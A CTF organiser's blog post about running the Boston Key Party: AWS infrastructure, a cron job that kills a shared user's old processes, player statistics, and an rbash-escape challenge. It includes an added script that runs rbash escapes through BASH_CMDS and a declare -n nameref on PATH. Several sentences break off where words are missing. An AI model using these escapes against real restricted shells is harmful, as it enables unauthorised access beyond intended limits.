This year, like the two previous ones, I had the pleasure of helping organise the Boston Key Party, a (hopefully) fun 48-hour-long capture the flag event serving as a qualifier for the (prestigious) Defcon one.
Last year, crowell and Amat wrote a really good-looking scoreboard, but it had some performance issues (protip: don't use ncurses on a forking server with several thousand simultaneous users). This is why (and also because we wanted more people to be able to easily administer the scoreboard) this year we went with CTFd, with a (super-ghetto) custom theme (that I wrote in a hurry, mostly with tears and stress).
The whole infrastructure was hosted on AWS: it's cheap (the whole CTF cost us 73 USD), it comes with a CDN (to palliate CTFd's asthmatic behaviour) and a WAF to block the DDoS attack (proudly powered by Wordpress) that hit the scoreboard around 2am (Paris time) on Saturday, and it's dead simple to spawn new machines and wire them together.
Since I'm not an über-proficient sysadmin, it was a fun opportunity to learn stuff like "how do you manage fork bombs from a single Linux user account used by several hundred people at the same time?" Having a nice
prevents your machine from burning to the ground, but it won't prevent people from maxing out the number of processes and keeping others from logging in.
Fortunately, one just has to add something like
echo '*/5 * * * * root killall -u ctfuser -s SIGKILL --older-than 5m' >> /etc/crontab
to kill the user's processes older than 5 minutes (*/5 * * * * fires every five minutes, whereas 1 * * * * would only fire at minute one of each hour, and killall's --older-than takes a unit suffix, hence 5m).
Someone mumbled something about using cgroups, but didn't get any further with it.
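For the same problem, here is a reaper that makes the selection step inspectable before anything gets killed. It is an added example, not the cron line from the post: it picks a user's processes by elapsed time from ps output instead of relying on killall, so it can be dry-run on a shared box first. The account name ctfuser and the five-minute threshold come from the post; the function names and the cron script path are assumptions.

```shell
#!/bin/sh
# Added example, not the crontab one-liner from the post: reap a shared
# account's long-running processes with a reviewable two-step pipeline.
# The account name (ctfuser) and the 5-minute threshold are the post's;
# the function names and the cron path below are assumptions.

# Read "pid etimes" lines on stdin, the format `ps -o pid=,etimes=` prints
# (PID and elapsed seconds since the process started, no header), and
# print the PIDs that have been alive longer than $1 seconds.
older_than() {
    limit=$1
    while read -r pid secs; do
        if [ "$secs" -gt "$limit" ]; then
            echo "$pid"
        fi
    done
}

# Kill every process of user $1 older than $2 seconds. Unlike `killall -u`
# this lets you dry-run the selection (drop the xargs stage) and does not
# need psmisc. `ps -u` selects by effective UID; `etimes` needs procps-ng.
reap_old_procs() {
    ps -u "$1" -o pid=,etimes= | older_than "$2" | xargs -r kill -KILL
}

# Constructed sample of what ps might print for ctfuser: only the two
# processes older than 300 s (five minutes) must be selected.
sample_ps_output='  4242 12
  4243 400
  4244 301'
printf '%s\n' "$sample_ps_output" | older_than 300   # prints 4243 then 4244

# Real use, every five minutes from the crontab (script path is an assumption):
#   */5 * * * * root /usr/local/sbin/reap-ctfuser
# where reap-ctfuser sources this file and calls: reap_old_procs ctfuser 300
```

Either form is a stopgap: the actual fix for a shared account is a hard cap on its process count, which is what the cgroup remark above points at (pids.max in a pids cgroup, or a hard nproc limit in /etc/security/limits.conf), so that a fork bomb fails on its own instead of being cleaned up every five minutes.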
Thanks to Amazon, we have some random/mildly interesting numbers about the CTF and the players:
- 43% of the requests to our infrastructure were from the USA, 6% from Korea, 6% from France, 4% from Japan and 4% from the Netherlands.
- We suffered several DDoS attempts.
- We served around 335GB of data in 48h, split in 2.5M http requests and 65K https ones.
- A lot of people tried a fake flag for vimjail, found in
- A bit less than 1300 teams registered, and something like 1000 of them scored at least one point.
- A bit more than 3000 wrong flags were submitted, and 2000 good ones, for our 23 challenges. We should throttle the number of flag submissions next year, and agree on a flag format (some challs were using
- Congratulations to HITCON, b1o0p and PPP for ranking respectively first, second and third.
Along with ensuring that every single task was up, running correctly, and could be managed by anyone on the team (mostly by yelling at people on Slack to get them to document their challenges), and telling random jokes in broken English while doing support on IRC, I also wrote 3 different challenges:
A couple of weeks ago, I was discussing with nurfed how we could improve the 26th level of websec.fr a bit, and he mentioned
but thought that everyone was already sitting on private escapes, since he personally had several. I wanted to check whether this was true, so I wrote a simple challenge based on it:
rbash! In total, 30 teams managed, in 48h, to find various 0days to escape from an rbash shell, in a chroot containing only rbash and a /fag/showFlag binary (along with the libraries required to make those run, of course). The fact that the challenge ran in a super-small chroot killed a lot of exploits that would have worked otherwise. So it seems that nurfed was wrong: not everyone had (or was willing to use)
I was also wondering whether people would be willing to burn their 0days in writeups or on IRC, or would be wise enough to stack them. On the other hand, since no one cares about rbash escapes, things would likely have been a bit different with more interesting, more widely used sandboxes.
The intended solution was
(PATH isn't writable, but BASH_CMDS is), but a team found another one:
declare -n. Someone told me that at least one team went completely overkill and wrote a working exploit of a use after free
popd to escape the sandbox.
Sorry, nurfed, about people finding your escapes, but I'm sure that you've still got working ones ;)
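To see which of the two escapes above a given bash build still accepts in restricted mode, here is a small probe script. It is an added example, not the challenge code or any team's exploit: it creates a throwaway directory holding an executable that only an escape can reach (the restricted shell's PATH deliberately does not contain it), then tries the slash-in-command baseline that rbash always refuses, the BASH_CMDS trick (PATH is read-only in rbash, but the command hash table exposed through BASH_CMDS could be pointed at an arbitrary absolute path, so a bare command name then ran a binary outside PATH), and a declare -n nameref that assigns PATH under another name. The RBASH_BIN variable and the function names are assumptions. Bash releases after this CTF started checking BASH_CMDS assignments in restricted mode, so on a current system that probe should report closed; the nameref probe tells you whether your build still accepts the second one.

```shell
#!/bin/sh
# Added example, not the challenge or any team's exploit: probe a bash
# binary's restricted mode (bash -r, which is what rbash runs) for the
# escapes named in the post. RBASH_BIN is an assumption; point it at the
# build you want to test.
RBASH_BIN="${RBASH_BIN:-bash}"

# Run snippet $1 in a fresh restricted shell. The snippet receives, as its
# own $1, a scratch directory containing an executable "probe" that prints
# ESCAPED; that directory is absent from the shell's PATH, so only an escape
# can run it. Prints "open" if ESCAPED came back, "closed" otherwise.
run_probe() {
    dir=$(mktemp -d) || return 1
    printf '#!/bin/sh\necho ESCAPED\n' > "$dir/probe"
    chmod 755 "$dir/probe"
    # Resolve the binary first so the PATH override only affects the child.
    bin=$(command -v "$RBASH_BIN" 2>/dev/null) || bin=$RBASH_BIN
    out=$(PATH=/usr/bin:/bin "$bin" -r -c "$1" rbash "$dir" 2>/dev/null || :)
    rm -rf "$dir"
    if [ "$out" = ESCAPED ]; then echo open; else echo closed; fi
}

# Baseline: restricted mode forbids slashes in command names, so this is
# always closed; it also shows the harness itself cannot reach the probe.
probe_slash()     { run_probe '"$1"/probe'; }

# The intended solution: PATH cannot be assigned, but (in bash builds of the
# time) the command hash table behind BASH_CMDS could be, binding a bare
# command name to any absolute path.
probe_bash_cmds() { run_probe 'BASH_CMDS[probe]="$1"/probe; probe'; }

# The alternative found during the CTF: assign PATH through a nameref
# (declare -n), sidestepping the check on the name PATH itself.
probe_nameref()   { run_probe 'declare -n p=PATH; p="$1"; probe'; }

printf 'slash in command name: %s\n' "$(probe_slash)"
printf 'BASH_CMDS hash table:  %s\n' "$(probe_bash_cmds)"
printf 'declare -n to PATH:    %s\n' "$(probe_nameref)"
```

A probe reporting open means that build of rbash, on its own, is not a sandbox for the account in question; the post's chroot with nothing but rbash and the flag binary is what made the escapes hard, not the shell. The script needs nothing outside POSIX sh plus the bash binary under test, so it can be dropped onto the jump host or chroot image as-is.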
A bit more than 10 years ago (damn.) I bought a Sansa e200v2 and slapped Rockbox on it; it was amazing! Now that I know some C, I thought it would make a great challenge to write a crackme plugin for it! You can find its source code here, and the whole archive here.
We ran a small survey (powered by Google Forms, sorry), and this is what I retain from it:
- ~60% of those surveyed found the difficulty just right, and ~40% found it too hard.
- Solitary Confinement was the most hated challenge ♥
- ~75% of those surveyed thought that 48h is the right duration.
- ~25% of those surveyed didn't join the IRC channel, and ~80% of them wanted to get updates via the website. We should address this point for next year.
I have a dump of some of the challenges, so feel free to hit me up if you forgot to download your favourite one.
I hope that everyone enjoyed playing it as much as we enjoyed running the Boston Key Party; see you next year!